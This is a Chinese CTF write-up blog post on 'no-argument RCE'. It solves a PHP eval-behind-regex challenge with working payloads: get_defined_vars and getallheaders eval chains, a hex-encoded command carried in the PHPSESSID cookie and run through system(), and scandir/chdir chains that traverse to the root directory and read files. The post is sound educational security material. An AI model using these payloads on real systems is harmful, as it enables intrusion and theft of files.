

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/tubiao.png">
  <link rel="icon" href="/img/tubiao.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#4F4F4F">
  <meta name="author" content="chen">
  <meta name="keywords" content="">
  
    <meta name="description" content="正常解题TGCTF–偷渡阴平考点总结： PHP session_id、绕过waf、无参RCE（非预期） 源码如下 12345678910111213 &lt;?php$tgctf2025&#x3D;$_GET[&#x27;tgctf2025&#x27;];if(!preg_match(&quot;&#x2F;0|1|[3-9]|\~|\&#96;|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\&#x3D;|\">
<meta property="og:type" content="article">
<meta property="og:title" content="无参RCE解题">
<meta property="og:url" content="https://yschen20.github.io/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/index.html">
<meta property="og:site_name" content="(๑´ڡ&#96;๑)">
<meta property="og:description" content="正常解题TGCTF–偷渡阴平考点总结： PHP session_id、绕过waf、无参RCE（非预期） 源码如下 12345678910111213 &lt;?php$tgctf2025&#x3D;$_GET[&#x27;tgctf2025&#x27;];if(!preg_match(&quot;&#x2F;0|1|[3-9]|\~|\&#96;|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\&#x3D;|\">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://yschen20.github.io/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250415002022637.png">
<meta property="og:image" content="https://yschen20.github.io/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250415005040694.png">
<meta property="og:image" content="https://yschen20.github.io/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250415004819352.png">
<meta property="og:image" content="https://yschen20.github.io/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250415124542664.png">
<meta property="og:image" content="https://yschen20.github.io/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250416162541034.png">
<meta property="og:image" content="https://yschen20.github.io/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250416163003976.png">
<meta property="article:published_time" content="2025-04-29T15:54:35.000Z">
<meta property="article:modified_time" content="2025-04-29T15:55:17.778Z">
<meta property="article:author" content="chen">
<meta property="article:tag" content="无参RCE">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://yschen20.github.io/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250415002022637.png">
<meta name="twitter:creator" content="@chen">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>无参RCE解题 - (๑´ڡ`๑)</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"yschen20.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2025-04-25T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>小晨的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/2.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="无参RCE解题"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        chen
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-04-29 23:54" pubdate>
          2025年4月29日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          16 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        

      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">无参RCE解题</h1>
            
              <p id="updated-time" class="note note-info" style="display: none">
                
                  
                    本文最后更新于 2025-04-29T23:55:17+08:00
                  
                  

                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="正常解题"><a href="#正常解题" class="headerlink" title="正常解题"></a>正常解题</h1><h3 id="TGCTF–偷渡阴平"><a href="#TGCTF–偷渡阴平" class="headerlink" title="TGCTF–偷渡阴平"></a>TGCTF–偷渡阴平</h3><p><strong>考点总结：</strong> PHP session_id、绕过waf、无参RCE（非预期）</p>
<p>源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-variable">$tgctf2025</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;tgctf2025&#x27;</span>];<br><br><span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\=|\+|\&#123;|\[|\]|\&#125;|\:|\&#x27;|\&quot;|\,|\&lt;|\.|\&gt;|\/|\?|\\\\/i&quot;</span>, <span class="hljs-variable">$tgctf2025</span>))&#123;<br>    <span class="hljs-comment">//hint：你可以对着键盘一个一个看，然后在没过滤的符号上用记号笔画一下（bushi</span><br>    <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$tgctf2025</span>);<br>&#125;<br><span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;(╯‵□′)╯炸弹！•••*～●&#x27;</span>);<br>&#125;<br><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br></code></pre></td></tr></table></figure>

<p>非预期打无参RCE</p>
<p><strong>方法一：</strong></p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">?tgctf2025=eval(<span class="hljs-keyword">end</span>(<span class="hljs-keyword">current</span>(get_defined_vars())));&amp;b=<span class="hljs-keyword">system</span>(<span class="hljs-string">&#x27;cat /flag&#x27;</span>);<br></code></pre></td></tr></table></figure>

<ul>
<li><code>get_defined_vars()</code>获取已经定义的所有变量并返回一个数组</li>
<li><code>current()</code>接收前面的函数返回的数组并返回数组第一个元素</li>
<li><code>end()</code>将会移动数组内部指针到最后一个数组元素并返回这个值</li>
<li><code>eval</code>将会执行返回的值，然后引用赋值（就是&amp;符号），将后边命令的结果赋值给b，这个b就是数组的最后一个元素，最终会被eval执行并且输出结果</li>
</ul>
<p><strong>方法二</strong>：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">?tgctf2025=var_dump(scandir(<span class="hljs-built_in">dirname</span>(<span class="hljs-built_in">dirname</span>(<span class="hljs-built_in">dirname</span>(getcwd())))));<br></code></pre></td></tr></table></figure>

<ul>
<li><code>getcwd()</code>：返回当前工作目录的绝对路径</li>
<li><code>dirname()</code>：这个函数会返回指定路径的父目录，这里可以利用这个函数进行目录穿越到根目录</li>
<li><code>scandir()</code>：这个函数会将指定目录下的所有文件和子目录的名称作为一个数组返回，这里返回的是根目录的所有文件和子目录</li>
<li><code>var_dump()</code>：将返回的含有根目录的文件和子目录名的数组打印出来</li>
</ul>
<p><img src="/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250415002022637.png" srcset="/img/loading.gif" lazyload alt="image-20250415002022637"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">?tgctf2025=highlight_file(array_rand(array_flip(scandir(<span class="hljs-built_in">dirname</span>(<span class="hljs-built_in">chdir</span>(<span class="hljs-built_in">dirname</span>(<span class="hljs-built_in">dirname</span>(<span class="hljs-built_in">dirname</span>(getcwd())))))))));<br></code></pre></td></tr></table></figure>

<ul>
<li><code>dirname(dirname(dirname(getcwd())))</code>：穿越到根目录，并返回根目录</li>
<li><code>chdir()</code>：这个函数会改变当前的工作目录到指定目录，这里将工作目录改变为根目录，并返回布尔值，如果没有这一步会发现不能读取根目录下的文件，只会报错</li>
<li><code>dirname()</code>：因为上面的函数的返回值是布尔类型，但后面的函数接收的类型要是指定的目录，所以这里要加一个这个函数，将返回值改成根目录</li>
<li><code>scandir()</code>：这个函数会将指定目录下的所有文件和子目录的名称作为一个数组返回，这里返回的是根目录的所有文件和子目录</li>
<li><code>array_flip()</code> ：这个函数用于交换数组中键和值的位置，若 <code>scandir()</code> 返回的数组是 <code>[&#39;.&#39;, &#39;..&#39;, &#39;file1.txt&#39;, &#39;file2.php&#39;]</code>，经过 <code>array_flip()</code> 处理后，会变成 <code>[&#39;.&#39; =&gt; 0, &#39;..&#39; =&gt; 1, &#39;file1.txt&#39; =&gt; 2, &#39;file2.php&#39; =&gt; 3]</code></li>
<li><code>array_rand()</code> ：这个函数用于从数组中随机选取一个或多个键，这里就会随机选一个文件</li>
<li><code>highlight_file()</code> ：这个函数将随机选取的文件内容高亮显示出来</li>
</ul>
<p>缺少<code>scandir()</code>函数更改工作目录这一步的结果是无法读取文件</p>
<p><img src="/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250415005040694.png" srcset="/img/loading.gif" lazyload alt="image-20250415005040694"></p>
<p>加上这个函数就可以读文件了，因为是随机选取一个文件，所以刷新几次就可以读到了</p>
<p><img src="/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250415004819352.png" srcset="/img/loading.gif" lazyload alt="image-20250415004819352"></p>
<p><strong>方法三</strong>：</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">?tgctf2025=show_source(<span class="hljs-built_in">array</span>_rand(<span class="hljs-built_in">array</span>_flip(scandir(dirname(chdir(strrev(crypt(serialize(<span class="hljs-built_in">array</span>())))))))));<br></code></pre></td></tr></table></figure>

<ul>
<li><code>array()</code>：创建一个空数组</li>
<li><code>serialize()</code>：将创建的空数组序列化成字符串，结果是<code>a:0:&#123;&#125;</code></li>
<li><code>crypt()</code>：对序列化后的字符串进行加密，最后得到的结果是随机的，如<code>$1$pc4jiIfD$pqtTfFXRHonNcpqbxqhtK.</code>，这里就是需要随机出最后一个字符是点<code>.</code></li>
<li><code>strrev()</code>：把加密后的字符串进行反转，将点<code>.</code>放到字符串的开头</li>
<li><code>ord()</code> 函数返回字符串第一个字符的 ASCII 值</li>
<li><code>chr()</code> 函数根据 ASCII 值返回对应的字符</li>
<li><code>chdir()</code>：这个函数会改变当前的工作目录到指定目录，这里将工作目录改变为根目录，并返回布尔值，如果没有这一步会发现不能读取根目录下的文件，只会报错</li>
<li><code>dirname()</code>：因为上面的函数的返回值是布尔类型，但后面的函数接收的类型要是指定的目录，所以这里要加一个这个函数，将返回值改成根目录</li>
<li><code>scandir()</code>：这个函数会将指定目录下的所有文件和子目录的名称作为一个数组返回，这里返回的是根目录的所有文件和子目录</li>
<li><code>array_flip()</code> ：这个函数用于交换数组中键和值的位置</li>
<li><code>array_rand()</code> ：这个函数用于从数组中随机选取一个或多个键，这里就会随机选一个文件</li>
<li><code>show_source()</code>：这个函数将随机选取的文件内容高亮显示出来</li>
</ul>
<h1 id="session-id"><a href="#session-id" class="headerlink" title="session_id()"></a>session_id()</h1><h2 id="hex2bin（）"><a href="#hex2bin（）" class="headerlink" title="hex2bin（）"></a>hex2bin（）</h2><h3 id="TGCTF–偷渡阴平（复仇）"><a href="#TGCTF–偷渡阴平（复仇）" class="headerlink" title="TGCTF–偷渡阴平（复仇）"></a>TGCTF–偷渡阴平（复仇）</h3><p>**考点总结：**PHP、session_id、绕过waf、RCE</p>
<p>这个把无参RCE给ban了，避免非预期</p>
<p>源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-variable">$tgctf2025</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;tgctf2025&#x27;</span>];<br><br><span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\=|\+|\&#123;|\[|\]|\&#125;|\:|\&#x27;|\&quot;|\,|\&lt;|\.|\&gt;|\/|\?|\\\\|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|split|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|dir|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|rand|flip|flip|rand|content|echo|readfile|highlight|show|source|file|assert/i&quot;</span>, <span class="hljs-variable">$tgctf2025</span>))&#123;<br>    <span class="hljs-comment">//hint：你可以对着键盘一个一个看，然后在没过滤的符号上用记号笔画一下（bushi</span><br>    <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$tgctf2025</span>);<br>&#125;<br><span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;(╯‵□′)╯炸弹！•••*～●&#x27;</span>);<br>&#125;<br><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br></code></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">?tgctf2025=<span class="hljs-title function_ invoke__">session_start</span>();<span class="hljs-title function_ invoke__">system</span>(<span class="hljs-title function_ invoke__">hex2bin</span>(<span class="hljs-title function_ invoke__">session_id</span>()));<br><span class="hljs-comment">// cookie中构造cat /flag的十六进制字符串</span><br>PHPSESSID=<span class="hljs-number">636174202</span>f666c6167<br></code></pre></td></tr></table></figure>

<ul>
<li><p><code>session_start()</code> ：在 PHP中 这个函数的作用是开启一个新会话或者复用已有的会话</p>
</li>
<li><p><code>session_id()</code> ：这个函数用于获取当前会话的 ID，即<code>cookie</code>中的<code>PHPSESSID</code></p>
</li>
<li><p><code>hex2bin()</code>：这个函数会将<code>PHPSESSID</code>的 十六进制字符串转化为二进制字符串</p>
</li>
<li><p><code>system()</code>：会执行转化后的二进制字符串命令</p>
</li>
</ul>
<p>这题的解题思路就是开启一个新会话，通过在当前会话的 ID 中构造要执行的命令，并转化为二进制字符串，使用<code>system()</code>函数执行命令</p>
<p><img src="/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250415124542664.png" srcset="/img/loading.gif" lazyload alt="image-20250415124542664"></p>
<h2 id="读文件"><a href="#读文件" class="headerlink" title="读文件"></a>读文件</h2><p>如果知道文件名，可以直接使用readfile读文件，在 PHPSESSION 中写入文件名</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-function"><span class="hljs-title"><span class="hljs-built_in">readfile</span></span>(<span class="hljs-title">session_id</span>(<span class="hljs-title">session_start</span>()));</span><br></code></pre></td></tr></table></figure>

<p><img src="/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250416162541034.png" srcset="/img/loading.gif" lazyload alt="image-20250416162541034"></p>
<h1 id="getallheaders"><a href="#getallheaders" class="headerlink" title="getallheaders()"></a>getallheaders()</h1><p>这个函数可以返回当前请求的所有请求头信息，局限于Apache</p>
<p><code>apache_request_headers()</code>和<code>getallheaders()</code>功能相似，可互相替代，不过也是局限于Apache</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-function"><span class="hljs-title">eval</span>(<span class="hljs-title">end</span>(<span class="hljs-title">getallheaders</span>()));</span><br></code></pre></td></tr></table></figure>

<p>这里可以在数据包最后加入一个请求头，写入恶意代码，使用<code>end()</code>函数指向最后一个请求头，从而可以执行命令</p>
<p><img src="/2025/04/29/%E6%97%A0%E5%8F%82RCE%E8%A7%A3%E9%A2%98/image-20250416163003976.png" srcset="/img/loading.gif" lazyload alt="image-20250416163003976"></p>
<h1 id="get-defined-vars"><a href="#get-defined-vars" class="headerlink" title="get_defined_vars()"></a>get_defined_vars()</h1><p>相较于<code>getallheaders()</code>更加具有普遍性，这个函数可以回显所有变量</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-variable">a</span>=<span class="hljs-function"><span class="hljs-title">eval</span>(<span class="hljs-title">end</span>(<span class="hljs-title">current</span>(<span class="hljs-title">get_defined_vars</span>())));&amp;<span class="hljs-variable">b</span>=<span class="hljs-title">system</span>(<span class="hljs-string">&#x27;ls /&#x27;</span>);</span><br></code></pre></td></tr></table></figure>

<ul>
<li><code>get_defined_vars()</code>获取已经定义的所有变量并返回一个数组</li>
<li><code>current()</code>接收前面的函数返回的数组并返回数组第一个元素</li>
<li><code>end()</code>将会移动数组内部指针到最后一个数组元素并返回这个值</li>
<li><code>eval</code>将会执行返回的值，然后引用赋值（就是&amp;符号），将后边命令的结果赋值给b，这个b就是数组的最后一个元素，最终会被eval执行并且输出结果</li>
</ul>
<h1 id="chdir-array-rand-赌狗读文件"><a href="#chdir-array-rand-赌狗读文件" class="headerlink" title="chdir()&amp;array_rand()赌狗读文件"></a>chdir()&amp;array_rand()赌狗读文件</h1><p>如果无法进行RCE，可以进行目录遍历读取文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment"># 获取当前目录</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-title function_ invoke__">getcwd</span>());<br><br><span class="hljs-comment"># 列出当前工作目录的父目录中的所有文件和目录</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-title function_ invoke__">getcwd</span>())));<br><br><span class="hljs-comment"># 读上一级文件名</span><br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-title function_ invoke__">array_rand</span>(<span class="hljs-title function_ invoke__">array_flip</span>(<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-title function_ invoke__">chdir</span>(<span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-title function_ invoke__">getcwd</span>())))))));<br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-title function_ invoke__">array_rand</span>(<span class="hljs-title function_ invoke__">array_flip</span>(<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-title function_ invoke__">ord</span>(<span class="hljs-title function_ invoke__">hebrevc</span>(<span class="hljs-title function_ invoke__">crypt</span>(<span class="hljs-title function_ invoke__">chdir</span>(<span class="hljs-title function_ invoke__">next</span>(<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-title function_ invoke__">getcwd</span>())))))))))));<br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-title function_ invoke__">array_rand</span>(<span class="hljs-title function_ invoke__">array_flip</span>(<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-title function_ invoke__">ord</span>(<span class="hljs-title function_ invoke__">hebrevc</span>(<span class="hljs-title function_ invoke__">crypt</span>(<span class="hljs-title function_ invoke__">chdir</span>(<span class="hljs-title function_ invoke__">next</span>(<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-title function_ invoke__">ord</span>(<span class="hljs-title function_ invoke__">hebrevc</span>(<span class="hljs-title function_ invoke__">crypt</span>(<span class="hljs-title function_ invoke__">phpversion</span>())))))))))))))));<br><br><span class="hljs-comment"># 读根目录</span><br><span class="hljs-title function_ invoke__">print_r</span>(<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-title function_ invoke__">ord</span>(<span class="hljs-title function_ invoke__">strrev</span>(<span class="hljs-title function_ invoke__">crypt</span>(<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-keyword">array</span>())))))));<br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-title function_ invoke__">array_rand</span>(<span class="hljs-title function_ invoke__">array_flip</span>(<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-title function_ invoke__">chdir</span>(<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-title function_ invoke__">ord</span>(<span class="hljs-title function_ invoke__">strrev</span>(<span class="hljs-title function_ invoke__">crypt</span>(<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-keyword">array</span>() )))))))))));<br></code></pre></td></tr></table></figure>








                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/" class="category-chain-item">漏洞笔记</a>
  
  
    <span>></span>
    
  <a href="/categories/%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/RCE/" class="category-chain-item">RCE</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%97%A0%E5%8F%82RCE/" class="print-no-link">#无参RCE</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>无参RCE解题</div>
      <div>https://yschen20.github.io/2025/04/29/无参RCE解题/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>chen</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年4月29日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2025年4月29日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/05/09/SSRF%E5%AD%A6%E4%B9%A0/" title="SSRF学习">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">SSRF学习</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/04/29/%E6%97%A0%E5%8F%82RCE%E5%87%BD%E6%95%B0/" title="无参RCE函数">
                        <span class="hidden-mobile">无参RCE函数</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="twikoo"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/twikoo/1.6.8/twikoo.all.min.js', function() {
        var options = Object.assign(
          {"envId":"https://imagegoo-twikoo.hf.space","region":"ap-shanghai","path":"window.location.pathname"},
          {
            el: '#twikoo',
            path: 'window.location.pathname',
            onCommentLoaded: function() {
              Fluid.utils.listenDOMLoaded(function() {
                var imgSelector = '#twikoo .tk-content img:not(.tk-owo-emotion)';
                Fluid.plugins.imageCaption(imgSelector);
